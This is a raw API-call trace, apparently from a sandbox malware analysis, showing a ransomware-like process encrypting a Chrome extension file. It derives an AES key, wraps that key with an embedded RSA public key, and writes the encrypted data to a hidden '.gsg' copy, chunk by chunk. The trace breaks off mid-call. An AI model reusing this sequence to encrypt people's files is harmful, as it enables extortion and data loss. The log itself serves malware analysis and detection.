[0258.359] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0258.361] GetLastError () returned 0x0 [0258.361] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js")) returned 0x20 [0258.362] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js", dwFileAttributes=0x80) returned 1 [0258.363] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.364] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.364] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.gsg", dwFileAttributes=0x2) returned 1 [0258.365] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0258.367] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0258.367] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.367] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.367] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0258.367] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.367] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0258.367] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e7a610) returned 1 [0258.368] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a610, dwCertEncodingType=0x1, pInfo=0x2e27320*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27350*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27358*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7fdc0) returned 1 [0258.368] CryptEncrypt (in: hKey=0x2e7fdc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0258.368] CryptEncrypt (in: hKey=0x2e7fdc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7bce8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e7bce8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0258.368] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7bce8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e7bce8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0258.369] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.388] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.388] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.396] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.396] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.396] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.396] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.396] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.396] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.396] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.396] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.396] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.397] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.397] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.397] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.397] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.397] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.397] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.397] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.397] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.397] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.398] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.398] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.398] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.398] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.398] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.398] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.398] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.399] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.399] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.399] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.399] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.399] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.399] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.399] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.400] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.400] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.400] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.400] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.400] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.401] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.401] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.401] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.401] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.401] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.401] WriteFile (in: 